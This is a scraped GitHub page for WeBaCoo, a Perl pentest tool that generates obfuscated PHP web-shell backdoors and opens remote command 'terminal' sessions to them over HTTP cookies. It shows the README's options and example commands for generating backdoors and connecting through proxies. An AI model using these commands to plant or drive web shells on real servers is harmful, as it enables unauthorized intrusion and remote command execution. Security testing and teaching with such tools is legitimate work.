Skip to content

HTTPS clone URL

Subversion checkout URL

You can clone with
or
.
Download ZIP
Web Backdoor Cookie Script-Kit
Perl
Branch: master
Pull request Compare This branch is 29 commits behind anestisb:master.

Fetching latest commit…

Cannot retrieve the latest commit at this time

Failed to load latest commit information.
CHANGELOG
LICENSE
README
TODO
webacoo.pl

README

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
 _    _     ______       _____             
| |  | |    | ___ \     /  __ \            
| |  | | ___| |_/ / __ _| /  \/ ___   ___  
| |/\| |/ _ \ ___ \/ _` | |    / _ \ / _ \ 
\  /\  /  __/ |_/ / (_| | \__/\ (_) | (_) |
 \/  \/ \___\____/ \__,_|\____/\___/ \___/ 
                                           
     Web Backdoor Cookie Script-Kit
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

Written by: Anestis Bechtsoudis @ bechtsoudis.com
Copyright (C) 2011 Anestis Bechtsoudis


Disclaimer
==========
The tool is only for testing purposes and can only be used where strict consent has been given. Do not use it for illegal purposes.

License
=======
Any modifications, changes, or alterations to this application is acceptable, however, any public releases utilizing this code must be approved by its creator. Check the LICENSE file for more information.

Usage
=====
webacoo.pl [options]

Options:
  -g		Generate backdoor code (-o is required)

  -f FUNCTION	PHP System function to use
	FUNCTION
		1: system 	(default)
		2: shell_exec
		3: exec
		4: passthru
		5: popen

  -o OUTPUT	Generated backdoor output filename

  -r 		Return un-obfuscated backdoor code

  -t		Establish remote "terminal" connection (-u is required)

  -u URL	Backdoor URL

  -c C_NAME	Cookie name (default "M-cookie")

  -d DELIM	Delimiter (default "wBc")

  -a AGENT	HTTP header user-agent (default exist)

  -p PROXY	Use proxy (IP:PORT or USER:PASS:IP:PORT)

  -v LEVEL	Verbose level
	LEVEL
		0: no additional info (default)
		1: print HTTP headers
		2: print HTTP headers + data

  -h		Display help and exit


Examples
========

1. Create 'backdoor.php' obfuscated backdoor with default settings
./webacoo.pl -g -o backdoor.php

2. Create 'raw-backdoor.php' un-obfuscated backdoor using 'passthru' function
./webacoo.pl -g -o raw-backdoor.php -f 4 -r

3. Establish "terminal" connection with remote host using the default setup
./webacoo.pl -t -u http://127.0.0.1/backdoor.php

4. Establish "terminal" connection with remote host while setting some args
./webacoo.pl -t -u http://127.0.0.1/backdoor.php -c "Test-Cookie" -d "TtT"

5. Establish "terminal" connection with remote host through local http proxy
./webacoo.pl -t -u http://10.0.1.13/backdoor.php -p 127.0.0.1:8080

6. Establish "terminal" connection with remote host through http proxy with basic auth
./webacoo.pl -t -u http://10.0.1.13/backdoor.php -p user:password:10.0.1.8:3128
Something went wrong with that request. Please try again.